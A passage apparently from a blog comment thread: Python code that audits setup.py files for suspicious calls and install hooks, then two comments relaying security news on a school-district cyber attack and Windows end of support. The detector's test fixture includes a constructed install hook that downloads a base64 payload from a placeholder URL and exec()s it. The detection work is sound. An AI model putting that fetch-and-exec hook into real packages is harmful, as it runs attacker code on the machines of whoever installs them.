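                aliases[alias.asname or top] = alias.name if alias.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
    return aliases


def _dotted_name(node: ast.AST, aliases: Dict[str, str]):
    if isinstance(node, ast.Name):
        return aliases.get(node.id, node.id)
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value, aliases)
        return f"{base}.{node.attr}" if base else None
    return None


def audit_setup_py(source: str) -> List[str]:
    """One finding per suspicious call or per install-hook override in setup(...)."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings: List[str] = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func, aliases)
        if name in SUSPICIOUS_CALLS:
            findings.append(f"line {node.lineno}: call to {name}")
        for kw in node.keywords:  # setup(..., cmdclass={"install": Cls}) runs Cls at install
            if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                for key in kw.value.keys:
                    if isinstance(key, ast.Constant) and key.value in INSTALL_HOOKS:
                        findings.append(f"line {node.lineno}: cmdclass overrides '{key.value}' hook")
    return findings


# Constructed sample: an ordinary package description.
BENIGN_SETUP_PY = """\
from setuptools import setup, find_packages

setup(name="demo-util", version="0.1.0", packages=find_packages())
"""

# Constructed sample: fetch-and-exec in an install hook plus a module-level process spawn.
SUSPICIOUS_SETUP_PY = """\
import base64, subprocess
from setuptools import setup
from setuptools.command.install import install
from urllib.request import urlopen

class PostInstall(install):
    def run(self):
        install.run(self)
        payload = urlopen("http://127.0.0.1:0/stage2").read()  # placeholder URL, never fetched
        exec(base64.b64decode(payload))

subprocess.Popen(["echo", "hi"])  # runs at import time, i.e. while pip builds the sdist
setup(name="evil-demo", version="0.0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP_PY), ("suspicious", SUSPICIOUS_SETUP_PY)):
        print(label, audit_setup_py(src) or "no findings")
```

This is a triage aid, not a verdict: obfuscated code (string-built names, `getattr` lookups) slips past a name-based check, which is why such a scan pairs with `pip download` into a scratch directory and a read of the sdist before any install, and why wheels (`pip install --only-binary :all:`) avoid running setup.py at all.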
  48. Tomi Engdahl says:

    Iowa’s Largest City Cancels Classes Due to Cyber Attack
    https://www.securityweek.com/iowas-largest-city-cancels-classes-due-cyber-attack

    Iowa’s largest school district cancelled classes for Tuesday after determining there was a cyber attack on its technology network.

    Des Moines Public Schools announced Monday that classes would be cancelled for its 33,000 students after being “alerted to a cyber security incident on its technology network.”

    The district said in a news release that it took its internet and network services offline while it assessed the situation. It didn’t describe the nature of the attack or say whether sensitive information might have been stolen, and it didn’t immediately respond to a request for further information.

    “Because many technology tools that support both classroom learning as well as the management and operation of the school district are not available at this time, the prudent decision is to close the district for the day,” the district said.

    Reply
  49. Tomi Engdahl says:

    Windows 7 Extended Security Updates, Windows 8.1 Reach End of Support
    https://www.securityweek.com/windows-7-extended-security-updates-windows-81-reach-end-support

    Today, on January 10, 2023, Windows 7 Extended Security Updates (ESU) and Windows 8.1 have reached their end of support dates.

    Windows 7 reached end of life (EoL) on January 14, 2020, but Microsoft gave customers the option to continue receiving important security updates through its ESU program. However, ESUs will no longer be available for purchase after January 10, 2023.

    Windows 8.1 support ends on the same day. Computers running this version of Windows will continue to function, but will no longer receive technical support, software updates and, importantly, security updates or patches. In addition, Microsoft will not be offering an ESU program for Windows 8.1.

    “Continuing to use Windows 8.1 after January 10, 2023 may increase an organization’s exposure to security risks or impact its ability to meet compliance obligations,” the tech giant warns.

    Microsoft also announced that Edge 109, scheduled for release on January 12, is the last version to support Windows 7, Windows 8.1, and Windows Server 2008 R2, Server 2012 and Server 2012 R2.

    Windows Server 2012 and Server 2012 R2 will reach end of support on October 10, 2023. After this date, these operating systems will no longer receive security and non-security updates, bug fixes, technical support, or online technical content updates.

    Reply
